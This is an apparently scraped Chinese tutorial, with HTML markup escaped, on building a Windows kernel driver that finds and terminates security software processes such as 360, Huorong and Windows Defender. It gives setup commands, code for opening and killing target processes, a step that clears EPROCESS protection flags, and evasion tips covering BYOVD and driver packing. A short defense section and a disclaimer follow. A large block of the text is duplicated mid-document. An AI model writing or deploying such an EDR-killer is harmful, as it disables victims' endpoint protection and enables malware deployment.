利用内核驱动终止安全软件进程技术教学文档<\/strong><\/h2>
1. 前言与概述<\/strong><\/h3>
本文档详细阐述如何编写一个Windows内核模式驱动程序（Kernel-Mode Driver），利用其高权限（Ring 0）来识别并终止常见的安全软件（如360、火绒、Windows Defender）进程。该技术通过直接调用内核原生API，绕过用户层防护，实现对受保护进程的强制终止。<\/p>
核心要点：<\/strong><\/p>

权限优势：<\/strong> 内核驱动运行在系统最高权限级别，不受用户层钩子和监控的限制。<\/li>
技术核心：<\/strong> 通过驱动获取目标进程句柄，修改其内核结构属性，最终调用系统函数终止它。<\/li>
参考项目：<\/strong> 本文内容基于对开源项目 NY-TASKKILL<\/code> 和 gmer64.sys<\/code> 驱动等资源的分析。<\/li> <\/ul> 开发环境准备：<\/strong><\/p> WDK (Windows Driver Kit):<\/strong> 用于驱动开发的官方工具包。<\/li> Visual Studio:<\/strong> 推荐使用支持WDK的版本。<\/li> 测试模式：<\/strong> 必须在Windows中开启测试签名模式，否则无法加载未经数字签名的驱动。命令：bcdedit \/set testsigning on<\/code><\/li> （注意：强烈建议在虚拟机中进行所有测试！）<\/strong><\/li> <\/ul> <\/li> <\/ol> 基础驱动开发流程（以KMDF为例）：<\/strong><\/p> 在VS中创建新的Kernel Mode Driver, Empty (KMDF)项目。<\/li> 编写驱动入口点（DriverEntry<\/code>）代码。<\/li> 解决编译问题：<\/strong> 确保在链接器（Linker）的附加选项（Additional Options）中添加 \/integritycheck<\/code> 参数。<\/li> 编译生成 .sys<\/code> 文件。<\/li> 将 .sys<\/code> 文件复制到 C:\Windows\System32\drivers\<\/code> 目录下。<\/li> 使用 sc<\/code> 命令创建和启动服务： sc create MyDriver binPath= "C:\Windows\System32\drivers\MyDriver.sys" type= kernel<\/code><\/li> sc start MyDriver<\/code><\/li> <\/ul> <\/li> <\/ol> 2. 核心数据结构与API详解<\/strong><\/h3> 2.1 CLIENT_ID<\/strong><\/h4> typedef<\/span> struct<\/span> _CLIENT_ID { <\/span><\/span> HANDLE UniqueProcess; \/\/ 目标进程的PID（内核中以句柄形式使用） <\/span><\/span><\/span><\/span> HANDLE UniqueThread; \/\/ 目标线程的TID（通常设为0，表示不指定线程） <\/span><\/span><\/span><\/span>} CLIENT_ID, *<\/span>PCLIENT_ID; <\/span><\/span><\/code><\/pre>作用：<\/strong> 在内核中唯一标识一个进程（或进程+线程组合）。是 ZwOpenProcess<\/code> 等函数定位目标进程的关键参数。注意：<\/strong> 内核态直接使用 HANDLE<\/code> 操作PID，与用户态常用的 DWORD<\/code> 类型不同，体现了对象引用的语义。<\/p> 2.2 OBJECT_ATTRIBUTES<\/strong><\/h4> typedef<\/span> struct<\/span> _OBJECT_ATTRIBUTES { <\/span><\/span> ULONG Length; <\/span><\/span> HANDLE RootDirectory; <\/span><\/span> PUNICODE_STRING ObjectName; <\/span><\/span> ULONG Attributes; <\/span><\/span> PVOID SecurityDescriptor; <\/span><\/span> PVOID SecurityQualityOfService; <\/span><\/span>} OBJECT_ATTRIBUTES, *<\/span>POBJECT_ATTRIBUTES; <\/span><\/span><\/code><\/pre>关键参数：<\/strong><\/p> Attributes<\/code>: 设置为 OBJ_KERNEL_HANDLE<\/code>。这表示创建的句柄仅在内核模式可见，防止该句柄被用户态程序恶意利用，增强安全性。<\/li> SecurityDescriptor<\/code>: 通常设为 NULL<\/code>，使用默认的安全设置。作用：<\/strong> 描述如何创建和打开内核对象（如进程、文件），指定其安全属性。<\/li> <\/ul> 2.3 关键内核API函数<\/strong><\/h4> 函数前缀<\/th> 所属模块<\/th> 核心作用与常见函数举例<\/th> <\/tr> <\/thead> Zw<\/strong><\/td> Native API (内核态入口)<\/td> 内核模式下直接访问系统服务，避免模式切换开销。ZwTerminateProcess<\/code><\/strong> (终止进程), ZwOpenProcess<\/code><\/strong> (打开进程), ZwQuerySystemInformation<\/code> (查询系统信息)<\/td> <\/tr> Ps<\/strong><\/td> 进程\/线程管理<\/td> 进程\/线程的创建、销毁、状态控制及事件监控。PsGetProcessId<\/code><\/strong> (获取进程ID), PsSetCreateProcessNotifyRoutine<\/code> (注册进程创建回调)<\/td> <\/tr> Ob<\/strong><\/td> 对象管理器 (Object Manager)<\/td> 管理内核对象的生命周期和安全访问。ObReferenceObjectByHandle<\/code><\/strong> (通过句柄获取对象指针并增加引用计数), ObDereferenceObject<\/code> (减少引用计数)<\/td> <\/tr> Ke<\/strong><\/td> 内核核心层<\/td> 线程调度、中断管理、同步。KeStackAttachProcess<\/code><\/strong> (将线程附加到目标进程地址空间), KeUnstackDetachProcess<\/code> (解除附加)<\/td> <\/tr> Io<\/strong><\/td> I\/O 子系统<\/td> 设备驱动与I\/O操作的核心交互。IoCreateDevice<\/code>, IoDeleteSymbolicLink<\/code><\/td> <\/tr> <\/tbody> <\/table> 3. 技术实现原理与步骤分析<\/strong><\/h3> 3.1 识别目标进程 (IsInEdrList函数)<\/strong><\/h4> 逻辑：<\/strong> 驱动内部维护一个预定义的安全软件进程名称关键词列表（例如：360safe.exe<\/code>, hipsmain.exe<\/code> (火绒), MsMpEng.exe<\/code> (Defender)）。方法：<\/strong> 通过遍历系统进程列表（通常使用 ZwQuerySystemInformation<\/code> 配合 SystemProcessInformation<\/code> 信息类），将每个运行的进程名与黑名单关键词进行匹配，从而识别出需要终止的目标进程PID。<\/p> 3.2 进程终止核心逻辑 (TerminateProcessByPid函数)<\/strong><\/h4> 这是驱动最核心的功能函数，其步骤如下：<\/p> 打开目标进程：<\/strong><\/p> \/\/ 初始化 CLIENT_ID 和 OBJECT_ATTRIBUTES <\/span><\/span><\/span><\/span>CLIENT_ID clientId =<\/span> { (HANDLE)targetPid, 0<\/span> }; <\/span><\/span>OBJECT_ATTRIBUTES objAttr =<\/span> { sizeof<\/span>(objAttr), 0<\/span>, 0<\/span>, OBJ_KERNEL_HANDLE }; <\/span><\/span> <\/span><\/span>\/\/ 以足够的权限（如 PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION）打开进程 <\/span><\/span><\/span><\/span>HANDLE hProcess; <\/span><\/span>NTSTATUS status =<\/span> ZwOpenProcess(&<\/span>hProcess, PROCESS_TERMINATE, &<\/span>objAttr, &<\/span>clientId); <\/span><\/span>if<\/span> (!<\/span>NT_SUCCESS(status)) { <\/span><\/span> \/\/ 处理打开失败 <\/span><\/span><\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/strong> 权限参数必须包含 PROCESS_TERMINATE<\/code>，仅用 PROCESS_QUERY_INFORMATION<\/code> 无法终止。<\/p> <\/li> 获取进程对象 (PEPROCESS)：<\/strong><\/p> PEPROCESS pEprocess; <\/span><\/span>status =<\/span> ObReferenceObjectByHandle(hProcess, PROCESS_ALL_ACCESS, *<\/span>PsProcessType, KernelMode, &<\/span>pEprocess, NULL); <\/span><\/span>if<\/span> (!<\/span>NT_SUCCESS(status)) { <\/span><\/span> ZwClose(hProcess); <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/strong> ObReferenceObjectByHandle<\/code> 将句柄转换为可操作的内核对象指针，并增加其引用计数，操作完后必须用 ObDereferenceObject<\/code> 减少计数，防止内存泄漏。<\/p> <\/li> （可选）修改进程标志位 - 解除保护：<\/strong><\/p> \/\/ 逆向经验表明，某些保护标志位可能为 0x2000 <\/span><\/span><\/span><\/span>pEprocess-><\/span>Flags &=<\/span> ~<\/span>0x2000u<\/span>; \/\/ 清除特定保护标志位 <\/span><\/span><\/span><\/code><\/pre>原理：<\/strong> PEPROCESS<\/code> 是内核中描述进程的核心结构体。某些安全软件会设置进程的保护标志（如 PS_PROTECTED_PROCESS<\/code> 的相关位），使其无法被终止。直接修改内核中的这些标志可以解除保护。注意：<\/strong> 此操作高度依赖于Windows内核版本和结构定义，需要逆向分析或微软的符号信息，不同系统版本可能偏移不同。<\/p> <\/li> 附加到目标进程上下文（如需访问进程内存）：<\/strong><\/p> KAPC_STATE apcState; <\/span><\/span>KeStackAttachProcess(pEprocess, &<\/span>apcState); <\/span><\/span>\/\/ ... 在此处操作目标进程的内存 ... <\/span><\/span><\/span><\/span>KeUnstackDetachProcess(&<\/span>apcState); <\/span><\/span><\/code><\/pre>原理：<\/strong> Windows通过地址空间隔离进程。KeStackAttachProcess<\/code> 将当前内核线程切换到目标进程的地址空间（通过切换CR3寄存器），使其能直接读写目标进程的内存。操作完毕后必须<\/strong>调用 KeUnstackDetachProcess<\/code> 恢复。<\/p> <\/li> 终止进程：<\/strong><\/p> status =<\/span> ZwTerminateProcess(hProcess, STATUS_SUCCESS); <\/span><\/span><\/code><\/pre><\/li> 清理资源：<\/strong><\/p> ObDereferenceObject(pEprocess); \/\/ 减少PEPROCESS对象的引用计数 <\/span><\/span><\/span><\/span>ZwClose(hProcess); \/\/ 关闭进程句柄 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 对抗与防御视角<\/strong><\/h3> 4.1 如何防御此类驱动攻击？<\/strong><\/h4> 驱动签名强制（DSE）：<\/strong> 启用并严格执行驱动签名强制（Driver Signature Enforcement），阻止加载未经验证签名的驱动。<\/li> 内核补丁保护（PatchGuard）：<\/strong> 现代Windows系统的PatchGuard会检测和阻止对关键内核结构（如 PEPROCESS->Flags<\/code>）的恶意修改，并引发蓝屏（BSOD）。<\/li> 进程自我保护：<\/strong> 安全软件驱动可以注册 ObRegisterCallbacks<\/code> 来监控进程句柄的打开操作。如果发现恶意驱动以 PROCESS_TERMINATE<\/code> 权限打开自身进程，可以拒绝该操作。<\/li> 监控驱动加载：<\/strong> 安全软件可监控系统的驱动加载情况，对可疑的、未知的驱动进行告警或拦截。<\/li> <\/ol> 4.2 攻击者的进阶绕过技术<\/strong><\/h4> 利用合法签名驱动：<\/strong> 寻找存在漏洞或功能滥用的、带有合法厂商签名的驱动（类似 gmer64.sys<\/code> 的例子），利用其提供的功能来实现终止操作。这种称为“自带驱动（BYOVD - Bring Your Own Vulnerable Driver）”攻击。<\/li> 驱动加壳\/混淆：<\/strong> 对恶意驱动进行加壳（如使用VMP对驱动代码加密）以绕过静态签名检测和逆向分析。<\/li> 更底层的内存操作：<\/strong> 在极端情况下，可能通过直接物理内存映射（MDL）等复杂手段绕过PatchGuard的检测（难度极大且极不稳定）。<\/li> <\/ol> 5. 总结与免责声明<\/strong><\/h3> 技术总结：<\/strong> 本技术通过编写内核驱动，利用 ZwOpenProcess<\/code> 和 ZwTerminateProcess<\/code> 等原生API，结合对内核对象结构的直接操作，实现了对受保护进程的强制终止。其核心在于内核态(Ring 0)的权限优势和对Windows内核机制的深刻理解。<\/p> 重要免责声明：<\/strong><\/p> 本文仅用于安全技术研究和教学目的，旨在帮助防御者了解攻击原理，从而构建更坚固的防御体系。<\/strong><\/li> 严禁将此类技术用于任何非法入侵、破坏他人计算机系统等违法犯罪活动。<\/strong><\/li> 内核开发极其危险，错误的代码可能导致系统瞬间蓝屏（BSOD）乃至数据损坏。<\/strong> 所有实验必须在隔离的虚拟机环境中进行。<\/li> 绕过安全防护机制可能违反软件的使用条款。<\/strong><\/li> <\/ul>

函数前缀<\/th>	所属模块<\/th>	核心作用与常见函数举例<\/th> <\/tr> <\/thead>
Zw<\/strong><\/td>	Native API (内核态入口)<\/td>	内核模式下直接访问系统服务，避免模式切换开销。`ZwTerminateProcess<\/code><\/strong> (终止进程), ZwOpenProcess<\/code><\/strong> (打开进程), ZwQuerySystemInformation<\/code> (查询系统信息)<\/td> <\/tr>`
Ps<\/strong><\/td>	进程\/线程管理<\/td>	进程\/线程的创建、销毁、状态控制及事件监控。`PsGetProcessId<\/code><\/strong> (获取进程ID), PsSetCreateProcessNotifyRoutine<\/code> (注册进程创建回调)<\/td> <\/tr>`
Ob<\/strong><\/td>	对象管理器 (Object Manager)<\/td>	管理内核对象的生命周期和安全访问。`ObReferenceObjectByHandle<\/code><\/strong> (通过句柄获取对象指针并增加引用计数), ObDereferenceObject<\/code> (减少引用计数)<\/td> <\/tr>`
Ke<\/strong><\/td>	内核核心层<\/td>	线程调度、中断管理、同步。`KeStackAttachProcess<\/code><\/strong> (将线程附加到目标进程地址空间), KeUnstackDetachProcess<\/code> (解除附加)<\/td> <\/tr>`
Io<\/strong><\/td>	I\/O 子系统<\/td>	设备驱动与I\/O操作的核心交互。IoCreateDevice<\/code>, IoDeleteSymbolicLink<\/code><\/td> <\/tr> <\/tbody> <\/table> 3. 技术实现原理与步骤分析<\/strong><\/h3> 3.1 识别目标进程 (IsInEdrList函数)<\/strong><\/h4> 逻辑：<\/strong> 驱动内部维护一个预定义的安全软件进程名称关键词列表（例如：360safe.exe<\/code>, hipsmain.exe<\/code> (火绒), MsMpEng.exe<\/code> (Defender)）。方法：<\/strong> 通过遍历系统进程列表（通常使用 ZwQuerySystemInformation<\/code> 配合 SystemProcessInformation<\/code> 信息类），将每个运行的进程名与黑名单关键词进行匹配，从而识别出需要终止的目标进程PID。<\/p> 3.2 进程终止核心逻辑 (TerminateProcessByPid函数)<\/strong><\/h4> 这是驱动最核心的功能函数，其步骤如下：<\/p> 打开目标进程：<\/strong><\/p> \/\/ 初始化 CLIENT_ID 和 OBJECT_ATTRIBUTES <\/span><\/span><\/span><\/span>CLIENT_ID clientId =<\/span> { (HANDLE)targetPid, 0<\/span> }; <\/span><\/span>OBJECT_ATTRIBUTES objAttr =<\/span> { sizeof<\/span>(objAttr), 0<\/span>, 0<\/span>, OBJ_KERNEL_HANDLE }; <\/span><\/span> <\/span><\/span>\/\/ 以足够的权限（如 PROCESS_TERMINATE \| PROCESS_QUERY_INFORMATION）打开进程 <\/span><\/span><\/span><\/span>HANDLE hProcess; <\/span><\/span>NTSTATUS status =<\/span> ZwOpenProcess(&<\/span>hProcess, PROCESS_TERMINATE, &<\/span>objAttr, &<\/span>clientId); <\/span><\/span>if<\/span> (!<\/span>NT_SUCCESS(status)) { <\/span><\/span> \/\/ 处理打开失败 <\/span><\/span><\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/strong> 权限参数必须包含 PROCESS_TERMINATE<\/code>，仅用 PROCESS_QUERY_INFORMATION<\/code> 无法终止。<\/p> <\/li> 获取进程对象 (PEPROCESS)：<\/strong><\/p> PEPROCESS pEprocess; <\/span><\/span>status =<\/span> ObReferenceObjectByHandle(hProcess, PROCESS_ALL_ACCESS, *<\/span>PsProcessType, KernelMode, &<\/span>pEprocess, NULL); <\/span><\/span>if<\/span> (!<\/span>NT_SUCCESS(status)) { <\/span><\/span> ZwClose(hProcess); <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/strong> ObReferenceObjectByHandle<\/code> 将句柄转换为可操作的内核对象指针，并增加其引用计数，操作完后必须用 ObDereferenceObject<\/code> 减少计数，防止内存泄漏。<\/p> <\/li> （可选）修改进程标志位 - 解除保护：<\/strong><\/p> \/\/ 逆向经验表明，某些保护标志位可能为 0x2000 <\/span><\/span><\/span><\/span>pEprocess-><\/span>Flags &=<\/span> ~<\/span>0x2000u<\/span>; \/\/ 清除特定保护标志位 <\/span><\/span><\/span><\/code><\/pre>原理：<\/strong> PEPROCESS<\/code> 是内核中描述进程的核心结构体。某些安全软件会设置进程的保护标志（如 PS_PROTECTED_PROCESS<\/code> 的相关位），使其无法被终止。直接修改内核中的这些标志可以解除保护。注意：<\/strong> 此操作高度依赖于Windows内核版本和结构定义，需要逆向分析或微软的符号信息，不同系统版本可能偏移不同。<\/p> <\/li> 附加到目标进程上下文（如需访问进程内存）：<\/strong><\/p> KAPC_STATE apcState; <\/span><\/span>KeStackAttachProcess(pEprocess, &<\/span>apcState); <\/span><\/span>\/\/ ... 在此处操作目标进程的内存 ... <\/span><\/span><\/span><\/span>KeUnstackDetachProcess(&<\/span>apcState); <\/span><\/span><\/code><\/pre>原理：<\/strong> Windows通过地址空间隔离进程。KeStackAttachProcess<\/code> 将当前内核线程切换到目标进程的地址空间（通过切换CR3寄存器），使其能直接读写目标进程的内存。操作完毕后必须<\/strong>调用 KeUnstackDetachProcess<\/code> 恢复。<\/p> <\/li> 终止进程：<\/strong><\/p> status =<\/span> ZwTerminateProcess(hProcess, STATUS_SUCCESS); <\/span><\/span><\/code><\/pre><\/li> 清理资源：<\/strong><\/p> ObDereferenceObject(pEprocess); \/\/ 减少PEPROCESS对象的引用计数 <\/span><\/span><\/span><\/span>ZwClose(hProcess); \/\/ 关闭进程句柄 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 对抗与防御视角<\/strong><\/h3> 4.1 如何防御此类驱动攻击？<\/strong><\/h4> 驱动签名强制（DSE）：<\/strong> 启用并严格执行驱动签名强制（Driver Signature Enforcement），阻止加载未经验证签名的驱动。<\/li> 内核补丁保护（PatchGuard）：<\/strong> 现代Windows系统的PatchGuard会检测和阻止对关键内核结构（如 PEPROCESS->Flags<\/code>）的恶意修改，并引发蓝屏（BSOD）。<\/li> 进程自我保护：<\/strong> 安全软件驱动可以注册 ObRegisterCallbacks<\/code> 来监控进程句柄的打开操作。如果发现恶意驱动以 PROCESS_TERMINATE<\/code> 权限打开自身进程，可以拒绝该操作。<\/li> 监控驱动加载：<\/strong> 安全软件可监控系统的驱动加载情况，对可疑的、未知的驱动进行告警或拦截。<\/li> <\/ol> 4.2 攻击者的进阶绕过技术<\/strong><\/h4> 利用合法签名驱动：<\/strong> 寻找存在漏洞或功能滥用的、带有合法厂商签名的驱动（类似 gmer64.sys<\/code> 的例子），利用其提供的功能来实现终止操作。这种称为“自带驱动（BYOVD - Bring Your Own Vulnerable Driver）”攻击。<\/li> 驱动加壳\/混淆：<\/strong> 对恶意驱动进行加壳（如使用VMP对驱动代码加密）以绕过静态签名检测和逆向分析。<\/li> 更底层的内存操作：<\/strong> 在极端情况下，可能通过直接物理内存映射（MDL）等复杂手段绕过PatchGuard的检测（难度极大且极不稳定）。<\/li> <\/ol> 5. 总结与免责声明<\/strong><\/h3> 技术总结：<\/strong> 本技术通过编写内核驱动，利用 ZwOpenProcess<\/code> 和 ZwTerminateProcess<\/code> 等原生API，结合对内核对象结构的直接操作，实现了对受保护进程的强制终止。其核心在于内核态(Ring 0)的权限优势和对Windows内核机制的深刻理解。<\/p> 重要免责声明：<\/strong><\/p> 本文仅用于安全技术研究和教学目的，旨在帮助防御者了解攻击原理，从而构建更坚固的防御体系。<\/strong><\/li> 严禁将此类技术用于任何非法入侵、破坏他人计算机系统等违法犯罪活动。<\/strong><\/li> 内核开发极其危险，错误的代码可能导致系统瞬间蓝屏（BSOD）乃至数据损坏。<\/strong> 所有实验必须在隔离的虚拟机环境中进行。<\/li> 绕过安全防护机制可能违反软件的使用条款。<\/strong><\/li> <\/ul>